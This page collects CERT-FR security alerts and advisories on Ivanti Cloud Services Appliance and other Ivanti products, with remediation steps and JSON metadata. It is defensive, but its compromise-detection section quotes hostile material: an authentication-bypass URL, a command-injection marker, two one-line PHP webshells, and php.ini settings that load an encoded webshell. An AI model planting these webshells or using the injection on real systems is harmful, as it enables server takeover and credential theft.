Refine your search

5 vulnerabilities found for Cloud Service Appliance (CSA) by Ivanti

CERTFR-2024-ALE-013
Vulnerability from certfr_alerte

Ivanti a publié plusieurs avis de sécurité sur des vulnérabilités affectant CSA qui sont activement exploitées : * le 10 septembre 2024, Ivanti a publié un avis de sécurité concernant la vulnérabilité CVE-2024-8190 qui permet à un attaquant, authentifié en tant qu'administrateur, d'exécuter du code arbitraire à distance sur un équipement CSA ; * le 13 septembre 2024, l'éditeur a ajouté que cette vulnérabilité était activement exploitée dans le cadre d'attaques ciblées ; * le 16 septembre 2024, le CERT-FR a eu connaissance de codes d'exploitation publics pour la vulnérabilité CVE-2024-8190 ; * le 19 septembre 2024, Ivanti a publié un nouvel avis de sécurité affectant CSA. La vulnérabilité CVE-2024-8963 permet à un attaquant non authentifié de contourner l'authentification et d'obtenir les droits administrateur ; * le 8 octobre 2024, Ivanti a publié un nouvel avis de sécurité affectant les CSA versions 5.0.1 et antérieures. Les vulnérabilités CVE-2024-9379 et CVE-2024-9380, combinées à la vulnérabilité CVE-2024-8963 présente sur les CSA versions 4.6 antérieures au correctif 519, permettent d’exécuter du code arbitraire à distance ; * le 11 octobre 2024 l'éditeur Fortinet a publié un billet de blogue [1] détaillant les exploitations constatées lors d'une opération de réponse à incidents.

L'éditeur a précisé que les vulnérabilités CVE-2024-8190 et CVE-2024-8963 étaient activement exploitées et a connaissance d’un nombre limité d’exploitations des vulnérabilités CVE-2024-9379 et CVE-2024-9380, combinées à la vulnérabilité CVE-2024-8963 sur les CSA en versions antérieures à 5.0 uniquement.

Le CERT-FR a connaissance de plusieurs compromissions dans lesquelles ces vulnérabilités ont été exploitées.

Recherche de compromission

Des traces d’exploitation sont identifiables dans les journaux /var/log/messages-<date>.tar.gz ou dans des journaux de reverse-proxy en privilégiant la période du 4 au 15 septembre 2024 : 1. requête HTTP GET vers l'URL /client/index.php%3F.php/gsb/users.php (CVE-2024-8963). Les attaquants peuvent utiliser des moyens d’obscurcissement pour contourner ce motif de détection ; 2. suivie d'une requête HTTP POST vers l'URL /gsb/datetime.php (CVE-2024-8190) ; 3. présence de PGPASSWORD pouvant indiquer une manipulation de la base de donnée contenant les informations de connexion ; 4. présence d'une requête contenant tripwire --update ; indiquant une injection de commandes au travers de la page reports.php.

Dans /var/log/messages* et /var/log/secure*, des traces d’exécutions de commandes malveillantes peuvent être identifiées : * base64 -d * tripwire –-update ; <injection de commande>

L'attaquant peut également utiliser des webshells situées dans le dossier /opt/landesk contenant uniquement l’une des deux lignes suivantes : * <?php @eval($_REQUEST[<variable>]); ?> * <?php system('/bin/sudo '. $_REQUEST[<variable>]);

Il existe également des combinaisons de ces deux lignes (sans le ?> final, avec ou sans guillemet autour de la variable, etc.). Les dates de dernière modification et de création de ces fichiers peuvent avoir été manipulées.

De plus, des indicateurs de compromission peuvent parfois être observés à la fin du fichier /etc/php.ini : * allow_url_include = On * auto_prepend_file = "data:;base64,<webshell encodé>"

Le CERT-FR recommande par ailleurs de chercher les indicateurs de compromission présentés dans l'article de Fortinet [1].

L'URL permettant d'exploiter la vulnérabilité CVE-2024-8963 a été massivement requêtée. Sa seule présence dans les journaux d'activité n'est donc pas nécessairement révélatrice d'une action malveillante. Il est néanmoins nécessaire de suivre les étapes 4 à 6 présentes dans la section Solution.

Solution

La version 5.0.2 de CSA corrige l'ensemble des vulnérabilités présentées. La version 4.6 n'est plus supportée par l'éditeur et ce dernier recommande de mettre à jour vers la version 5.0.2. L’éditeur recommande l’utilisation de deux interfaces réseau, en utilisant eth0 uniquement pour le réseau interne.

Si vous êtes en présence d'un CSA qui était en version 4.6 et accessible depuis Internet en septembre ou octobre 2024, il est impératif d’effectuer une recherche de traces d’exploitation de vulnérabilité sur l’équipement ou la machine virtuelle, ainsi que de tentatives de latéralisation.

En cas de compromission ou suspicion de compromission :

  1. isoler les équipements compromis du réseau et réaliser un gel de données (instantané pour les machines virtuelles, isolement de l’équipement s’il s’agit d’un équipement physique) à des fins d’investigations approfondies ;
  2. signaler l’événement auprès du CERT-FR en mettant en copie vos éventuels CSIRTs métier ;
  3. reconstruire la solution CSA en version 5.0.2 et son système d’exploitation sur lequel il repose à partir de source éditeur. L'attaquant peut déposer un implant qui ne sera pas supprimé avec la simple réinstallation de l'application ;
  4. réinitialiser tous les secrets de façon générale (mot de passe, certificat, etc.) configurés sur les équipements affectés ;
  5. réinitialiser tous les secrets d’authentification susceptibles d’avoir transités sur les équipements affectés (si applicable) ;
  6. vérifier que l'ensemble des utilisateurs du système sont légitimes ;
  7. rechercher toutes traces de latéralisation sur le reste du système d’information, notamment :
    • en cherchant les connexions ou tentatives de connexion vers Internet depuis l'équipement compromis ;
    • puis en cherchant ces adresses IP de destination pour vérifier si d’autres machines ont tenté une connexion ;
    • en analysant les journaux des EDR ou les journaux Windows pour identifier des connexions depuis l'équipement compromis.
  8. identifier les comptes du domaine Active Directory qui seraient configurés sur l'équipement suspecté puis :
    • vérifier l'activité réalisée à partir de ce compte ;
    • réinitialiser les secrets associés à ces comptes afin d'éviter que l'attaquant ne puisse réutiliser ailleurs les identifiants éventuellement obtenus sur l'équipement.

Le CERT-FR vous recontactera si nécessaire pour le traitement de l’incident ou vous communiquera des éléments supplémentaires. En cas de suspicion de compromission, il est recommandé de consulter les bons réflexes en cas d'intrusion sur votre système d'information [2], ainsi que les fiches réflexe sur la compromission système [3] [4].

Une chaine d’exploitation complète est connue pour les produits Ivanti Cloud Services Appliance de versions antérieures à 5.0, notamment les versions 4.6 n’ayant pas appliqué le correctif 519. Les vulnérabilités CVE-2024-8190, CVE-2024-8963 et CVE-2024-9380 ont été exploitées avant la publication de ce correctif. Le CERT-FR n’a pas connaissance d’une chaine d’exploitation impactant les versions 5.0.x.

Impacted products
Vendor Product Description
Ivanti Cloud Service Appliance (CSA) Ivanti Cloud Services Appliance (CSA) versions antérieures à 5.0.2

Show details on source website


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Ivanti Cloud Services Appliance (CSA) versions ant\u00e9rieures \u00e0 5.0.2",
      "product": {
        "name": "Cloud Service Appliance (CSA)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "Une chaine d\u2019exploitation compl\u00e8te est connue pour les produits Ivanti Cloud Services Appliance de versions ant\u00e9rieures \u00e0 5.0, notamment les versions 4.6 n\u2019ayant pas appliqu\u00e9 le correctif 519.\nLes vuln\u00e9rabilit\u00e9s CVE-2024-8190, CVE-2024-8963 et CVE-2024-9380 ont \u00e9t\u00e9 exploit\u00e9es avant la publication de ce correctif.\nLe CERT-FR n\u2019a pas connaissance d\u2019une chaine d\u2019exploitation impactant les versions 5.0.x.",
  "closed_at": "2025-03-31",
  "content": "## Recherche de compromission\n\nDes traces d\u2019exploitation sont identifiables dans les journaux `/var/log/messages-\u003cdate\u003e.tar.gz` ou dans des journaux de reverse-proxy en privil\u00e9giant la p\u00e9riode du 4 au 15 septembre 2024 :\n1. requ\u00eate HTTP GET vers l\u0027URL `/client/index.php%3F.php/gsb/users.php` (CVE-2024-8963). Les attaquants peuvent utiliser des moyens d\u2019obscurcissement pour contourner ce motif de d\u00e9tection ; \n2. suivie d\u0027une requ\u00eate HTTP POST vers l\u0027URL `/gsb/datetime.php` (CVE-2024-8190) ;\n3. pr\u00e9sence de `PGPASSWORD` pouvant indiquer une manipulation de la base de donn\u00e9e contenant les informations de connexion ;\n4. pr\u00e9sence d\u0027une requ\u00eate contenant `tripwire --update ;` indiquant une injection de commandes au travers de la page `reports.php`.\n\nDans `/var/log/messages*` et `/var/log/secure*`, des traces d\u2019ex\u00e9cutions de commandes malveillantes peuvent \u00eatre identifi\u00e9es :\n* `base64 -d`\n* `tripwire \u2013-update ; \u003cinjection de commande\u003e`\n\nL\u0027attaquant peut \u00e9galement utiliser des *webshells* situ\u00e9es dans le dossier `/opt/landesk` contenant uniquement l\u2019une des deux lignes suivantes :\n* `\u003c?php @eval($_REQUEST[\u003cvariable\u003e]);  ?\u003e`\n* `\u003c?php system(\u0027/bin/sudo \u0027. $_REQUEST[\u003cvariable\u003e]);`\n\nIl existe \u00e9galement des combinaisons de ces deux lignes (sans le  `?\u003e` final, avec ou sans guillemet autour de la variable, etc.). Les dates de derni\u00e8re modification et de cr\u00e9ation de ces fichiers peuvent avoir \u00e9t\u00e9 manipul\u00e9es. \n\nDe plus, des indicateurs de compromission peuvent parfois \u00eatre observ\u00e9s \u00e0 la fin du fichier `/etc/php.ini` :\n* `allow_url_include = On`\n* `auto_prepend_file = \"data:;base64,\u003cwebshell encod\u00e9\u003e\"`\n\nLe CERT-FR recommande par ailleurs de chercher les indicateurs de compromission pr\u00e9sent\u00e9s dans l\u0027article de Fortinet [1].\n\nL\u0027URL permettant d\u0027exploiter la vuln\u00e9rabilit\u00e9 CVE-2024-8963 a \u00e9t\u00e9 massivement requ\u00eat\u00e9e. Sa seule pr\u00e9sence dans les journaux d\u0027activit\u00e9 n\u0027est donc pas n\u00e9cessairement r\u00e9v\u00e9latrice d\u0027une action malveillante. Il est n\u00e9anmoins n\u00e9cessaire de suivre les \u00e9tapes 4 \u00e0 6 pr\u00e9sentes dans la section Solution. \n\n## Solution \n\nLa version 5.0.2 de CSA corrige l\u0027ensemble des vuln\u00e9rabilit\u00e9s pr\u00e9sent\u00e9es. La version 4.6 n\u0027est plus support\u00e9e par l\u0027\u00e9diteur et ce dernier recommande de mettre \u00e0 jour vers la version 5.0.2. L\u2019\u00e9diteur recommande l\u2019utilisation de deux interfaces r\u00e9seau, en utilisant `eth0` uniquement pour le r\u00e9seau interne.\n\nSi vous \u00eates en pr\u00e9sence d\u0027un CSA qui \u00e9tait en version 4.6 et accessible depuis Internet en septembre ou octobre 2024, il est imp\u00e9ratif d\u2019effectuer une recherche de traces d\u2019exploitation de vuln\u00e9rabilit\u00e9 sur l\u2019\u00e9quipement ou la machine virtuelle, ainsi que de tentatives de lat\u00e9ralisation.\n\nEn cas de compromission ou suspicion de compromission :\n\n1. isoler les \u00e9quipements compromis du r\u00e9seau et r\u00e9aliser un gel de donn\u00e9es (instantan\u00e9 pour les machines virtuelles, isolement de l\u2019\u00e9quipement s\u2019il s\u2019agit d\u2019un \u00e9quipement physique) \u00e0 des fins d\u2019investigations approfondies ;\n2. signaler l\u2019\u00e9v\u00e9nement aupr\u00e8s du CERT-FR en mettant en copie vos \u00e9ventuels CSIRTs m\u00e9tier ; \n3. reconstruire la solution CSA en version 5.0.2 et son syst\u00e8me d\u2019exploitation sur lequel il repose \u00e0 partir de source \u00e9diteur. L\u0027attaquant peut d\u00e9poser un implant qui ne sera pas supprim\u00e9 avec la simple r\u00e9installation de l\u0027application ;\n4. r\u00e9initialiser tous les secrets de fa\u00e7on g\u00e9n\u00e9rale (mot de passe, certificat, etc.) configur\u00e9s sur les \u00e9quipements affect\u00e9s ; \n5. r\u00e9initialiser tous les secrets d\u2019authentification susceptibles d\u2019avoir transit\u00e9s sur les \u00e9quipements affect\u00e9s (si applicable) ;\n6. v\u00e9rifier que l\u0027ensemble des utilisateurs du syst\u00e8me sont l\u00e9gitimes ; \n7. rechercher toutes traces de lat\u00e9ralisation sur le reste du syst\u00e8me d\u2019information, notamment :\n    * en cherchant les connexions ou tentatives de connexion vers Internet depuis l\u0027\u00e9quipement compromis ;\n    * puis en cherchant ces adresses IP de destination pour v\u00e9rifier si d\u2019autres machines ont tent\u00e9 une connexion ;\n    * en analysant les journaux des EDR ou les journaux Windows pour identifier des connexions depuis l\u0027\u00e9quipement compromis. \n8. identifier les comptes du domaine Active Directory qui seraient configur\u00e9s sur l\u0027\u00e9quipement suspect\u00e9 puis :\n    * v\u00e9rifier l\u0027activit\u00e9 r\u00e9alis\u00e9e \u00e0 partir de ce compte ;\n    * r\u00e9initialiser les secrets associ\u00e9s \u00e0 ces comptes afin d\u0027\u00e9viter que l\u0027attaquant ne puisse r\u00e9utiliser ailleurs les identifiants \u00e9ventuellement obtenus sur l\u0027\u00e9quipement.\n\nLe CERT-FR vous recontactera si n\u00e9cessaire pour le traitement de l\u2019incident ou vous communiquera des \u00e9l\u00e9ments suppl\u00e9mentaires. En cas de suspicion de compromission, il est recommand\u00e9 de consulter les [bons r\u00e9flexes en cas d\u0027intrusion sur votre syst\u00e8me d\u0027information](https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/) [2], ainsi que les fiches r\u00e9flexe sur la compromission syst\u00e8me [3] [4]. \n",
  "cves": [
    {
      "name": "CVE-2024-9380",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9380"
    },
    {
      "name": "CVE-2024-8963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8963"
    },
    {
      "name": "CVE-2024-8190",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8190"
    }
  ],
  "initial_release_date": "2025-03-31T00:00:00",
  "last_revision_date": "2025-03-31T00:00:00",
  "links": [
    {
      "title": "[2] Les bons r\u00e9flexes en cas d\u2019intrusion sur un syst\u00e8me d\u2019information",
      "url": "https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/"
    },
    {
      "title": "[4] Fiche r\u00e9flexe Compromission syst\u00e8me - Endiguement",
      "url": "https://www.cert.ssi.gouv.fr/fiche/CERTFR-2024-RFX-006/"
    },
    {
      "title": "[3]\u00a0Fiche r\u00e9flexe Compromission syst\u00e8me - Qualification",
      "url": "https://www.cert.ssi.gouv.fr/fiche/CERTFR-2024-RFX-005/"
    },
    {
      "title": "Avis CERTFR-2024-AVI-0851 du 09 octobre 2024",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0851/"
    },
    {
      "title": "Bulletin d\u0027actualit\u00e9 CERTFR-2024-ACT-045 du 14 octobre 2024",
      "url": "https://www.cert.ssi.gouv.fr/actualite/CERTFR-2024-ACT-045/"
    },
    {
      "title": "Avis CERTFR-2024-AVI-0796 du 20 septembre 2024",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0796/"
    },
    {
      "title": "[1] Billet de blogue de FortiGuard Labs Threat Research du 11 octobre 2024 ",
      "url": "https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa"
    }
  ],
  "reference": "CERTFR-2024-ALE-013",
  "revisions": [
    {
      "description": "    Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
      "revision_date": "2025-03-31T00:00:00.000000"
    },
    {
      "description": "Version initiale",
      "revision_date": "2024-10-22T00:00:00.000000"
    },
    {
      "description": "Correction d\u0027un marqueur pr\u00e9sent dans les fichiers de /var/log/",
      "revision_date": "2024-10-25T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    }
  ],
  "summary": "Ivanti a publi\u00e9 plusieurs avis de s\u00e9curit\u00e9 sur des vuln\u00e9rabilit\u00e9s affectant CSA qui sont activement exploit\u00e9es :\n* le 10 septembre 2024, Ivanti a publi\u00e9 un avis de s\u00e9curit\u00e9 concernant la vuln\u00e9rabilit\u00e9 CVE-2024-8190 qui permet \u00e0 un attaquant, authentifi\u00e9 en tant qu\u0027administrateur, d\u0027ex\u00e9cuter du code arbitraire \u00e0 distance sur un \u00e9quipement CSA ;\n* le 13 septembre 2024, l\u0027\u00e9diteur a ajout\u00e9 que cette vuln\u00e9rabilit\u00e9 \u00e9tait activement exploit\u00e9e dans le cadre d\u0027attaques cibl\u00e9es ;\n* le 16 septembre 2024, le CERT-FR a eu connaissance de codes d\u0027exploitation publics pour la vuln\u00e9rabilit\u00e9 CVE-2024-8190 ;\n* le 19 septembre 2024, Ivanti a publi\u00e9 un nouvel avis de s\u00e9curit\u00e9 affectant CSA. La vuln\u00e9rabilit\u00e9 CVE-2024-8963 permet \u00e0 un attaquant non authentifi\u00e9 de contourner l\u0027authentification et d\u0027obtenir les droits administrateur ;\n* le 8 octobre 2024, Ivanti a publi\u00e9 un nouvel avis de s\u00e9curit\u00e9 affectant les CSA versions 5.0.1 et ant\u00e9rieures. Les vuln\u00e9rabilit\u00e9s CVE-2024-9379 et CVE-2024-9380, combin\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2024-8963 pr\u00e9sente sur les CSA versions 4.6 ant\u00e9rieures au correctif 519, permettent d\u2019ex\u00e9cuter du code arbitraire \u00e0 distance ;\n* le 11 octobre 2024 l\u0027\u00e9diteur Fortinet a publi\u00e9 un billet de blogue [1] d\u00e9taillant les exploitations constat\u00e9es lors d\u0027une op\u00e9ration de r\u00e9ponse \u00e0 incidents.\n \nL\u0027\u00e9diteur a pr\u00e9cis\u00e9 que les vuln\u00e9rabilit\u00e9s CVE-2024-8190 et CVE-2024-8963 \u00e9taient activement exploit\u00e9es et a connaissance d\u2019un nombre limit\u00e9 d\u2019exploitations des vuln\u00e9rabilit\u00e9s CVE-2024-9379 et CVE-2024-9380, combin\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2024-8963 sur les CSA en versions ant\u00e9rieures \u00e0 5.0 uniquement. \n\n**Le CERT-FR a connaissance de plusieurs compromissions dans lesquelles ces vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 exploit\u00e9es.**",
  "title": "Exploitations de vuln\u00e9rabilit\u00e9s dans Ivanti Cloud Services Appliance (CSA)",
  "vendor_advisories": [
    {
      "published_at": "2024-10-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US"
    },
    {
      "published_at": "2024-09-19",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US"
    },
    {
      "published_at": "2024-09-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US"
    }
  ]
}

CERTFR-2024-AVI-1058
Vulnerability from certfr_avis

De multiples vulnérabilités ont été découvertes dans les produits Ivanti. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products
Vendor Product Description
Ivanti Policy Secure (IPS) Policy Secure (IPS) versions 22.7R1.x antérieures à 22.7R1.2
Ivanti Sentry Sentry versions 10.0.x antérieures à 10.0.2
Ivanti Endpoint Manager (EPM) Endpoint Manager versions 2022 SU6 et antérieures sans le dernier correctif publié par l'éditeur
Ivanti Endpoint Manager (EPM) Endpoint Manager versions 2024 et antérieures sans le dernier correctif publié par l'éditeur
Ivanti Desktop and Server Management (DSM) Desktop and Server Management (DSM) versions 2024.2 antérieures à 2024.3.5740
Ivanti Sentry Sentry versions 10.1.x antérieures à 10.1.0
Ivanti Cloud Service Appliance (CSA) Ivanti Cloud Services Application (CSA) versions 5.0.x antérieures à 5.0.3
Ivanti Connect Secure (ICS) Connect Secure (ICS) versions 22.7R2.x antérieures à 22.7R2.4
Ivanti Sentry Sentry versions 9.20.x antérieures à 9.20.2

Show details on source website


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Policy Secure (IPS) versions 22.7R1.x ant\u00e9rieures \u00e0 22.7R1.2",
      "product": {
        "name": "Policy Secure (IPS)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Sentry versions 10.0.x ant\u00e9rieures \u00e0 10.0.2",
      "product": {
        "name": "Sentry",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Endpoint Manager versions 2022 SU6 et ant\u00e9rieures sans le dernier correctif publi\u00e9 par l\u0027\u00e9diteur",
      "product": {
        "name": "Endpoint Manager (EPM)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Endpoint Manager versions 2024 et ant\u00e9rieures sans le dernier correctif publi\u00e9 par l\u0027\u00e9diteur",
      "product": {
        "name": "Endpoint Manager (EPM)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Desktop and Server Management (DSM)  versions 2024.2 ant\u00e9rieures \u00e0 2024.3.5740",
      "product": {
        "name": "Desktop and Server Management (DSM)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Sentry versions 10.1.x ant\u00e9rieures \u00e0 10.1.0",
      "product": {
        "name": "Sentry",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Ivanti Cloud Services Application (CSA)  versions 5.0.x ant\u00e9rieures \u00e0 5.0.3",
      "product": {
        "name": "Cloud Service Appliance (CSA)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Connect Secure (ICS) versions 22.7R2.x ant\u00e9rieures \u00e0 22.7R2.4",
      "product": {
        "name": "Connect Secure (ICS)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Sentry versions 9.20.x ant\u00e9rieures \u00e0 9.20.2",
      "product": {
        "name": "Sentry",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2024-9844",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9844"
    },
    {
      "name": "CVE-2024-37377",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-37377"
    },
    {
      "name": "CVE-2024-11772",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11772"
    },
    {
      "name": "CVE-2024-7572",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7572"
    },
    {
      "name": "CVE-2024-8540",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8540"
    },
    {
      "name": "CVE-2024-11773",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11773"
    },
    {
      "name": "CVE-2024-10256",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10256"
    },
    {
      "name": "CVE-2024-11633",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11633"
    },
    {
      "name": "CVE-2024-11639",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11639"
    },
    {
      "name": "CVE-2024-37401",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-37401"
    },
    {
      "name": "CVE-2024-11634",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11634"
    }
  ],
  "initial_release_date": "2024-12-11T00:00:00",
  "last_revision_date": "2024-12-11T00:00:00",
  "links": [],
  "reference": "CERTFR-2024-AVI-1058",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2024-12-11T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Ivanti. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Ivanti",
  "vendor_advisories": [
    {
      "published_at": "2024-12-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256"
    },
    {
      "published_at": "2024-12-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773"
    },
    {
      "published_at": "2024-12-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti Security-Advisory-Ivanti-Sentry-CVE-2024-8540",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540"
    },
    {
      "published_at": "2024-12-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti Security-Advisory-Ivanti-Desktop-and-Server-Management-DSM-CVE-2024-7572",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Desktop-and-Server-Management-DSM-CVE-2024-7572"
    },
    {
      "published_at": "2024-12-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs",
      "url": "https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs"
    }
  ]
}

CERTFR-2024-AVI-0851
Vulnerability from certfr_avis

De multiples vulnérabilités ont été découvertes dans les produits Ivanti. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

Ivanti indique que les vulnérabilités CVE-2024-9379 et CVE-2024-9380 sont activement exploitées dans le cadre d'attaques ciblées, en combinaison avec la vulnérabilité CVE-2024-8963.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Ivanti rappelle que la version 4.6 de CSA est considérée obsolète et ne reçoit plus de correctifs de sécurité depuis le 10 septembre 2024.

Impacted products
Vendor Product Description
Ivanti Connect Secure (ICS) Connect Secure versions antérieures à 22.7R2.1 ou 22.7R2.2
Ivanti Policy Secure (IPS) Policy Secure versions antérieures à 22.7R1.1
Ivanti Endpoint Manager pour Mobile Endpoint Manager Mobile (EPMM) versions antérieures à 12.0.0.5
Ivanti Endpoint Manager pour Mobile Endpoint Manager Mobile (EPMM) versions 12.1.x antérieures à 12.1.0.4
Ivanti Cloud Service Appliance (CSA) Cloud Services Appliance (CSA) versions antérieures à 5.0.2
Ivanti Connect Secure (ICS) Connect Secure versions antérieures à 9.1R18.9 (prévue pour le 15 octobre 2024)
References

Show details on source website


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Connect Secure versions ant\u00e9rieures \u00e0 22.7R2.1 ou 22.7R2.2",
      "product": {
        "name": "Connect Secure (ICS)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Policy Secure versions ant\u00e9rieures \u00e0 22.7R1.1",
      "product": {
        "name": "Policy Secure (IPS)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Endpoint Manager Mobile (EPMM) versions ant\u00e9rieures \u00e0 12.0.0.5",
      "product": {
        "name": "Endpoint Manager pour Mobile",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Endpoint Manager Mobile (EPMM) versions 12.1.x ant\u00e9rieures \u00e0 12.1.0.4",
      "product": {
        "name": "Endpoint Manager pour Mobile",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Cloud Services Appliance (CSA) versions ant\u00e9rieures \u00e0 5.0.2",
      "product": {
        "name": "Cloud Service Appliance (CSA)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    },
    {
      "description": "Connect Secure versions ant\u00e9rieures \u00e0 9.1R18.9 (pr\u00e9vue pour le 15 octobre 2024)",
      "product": {
        "name": "Connect Secure (ICS)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "Ivanti rappelle que la version 4.6 de CSA est consid\u00e9r\u00e9e obsol\u00e8te et ne re\u00e7oit plus de correctifs de s\u00e9curit\u00e9 depuis le 10 septembre 2024.",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2024-7612",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7612"
    },
    {
      "name": "CVE-2024-37404",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-37404"
    },
    {
      "name": "CVE-2024-9381",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9381"
    },
    {
      "name": "CVE-2024-9380",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9380"
    },
    {
      "name": "CVE-2024-9379",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9379"
    }
  ],
  "initial_release_date": "2024-10-09T00:00:00",
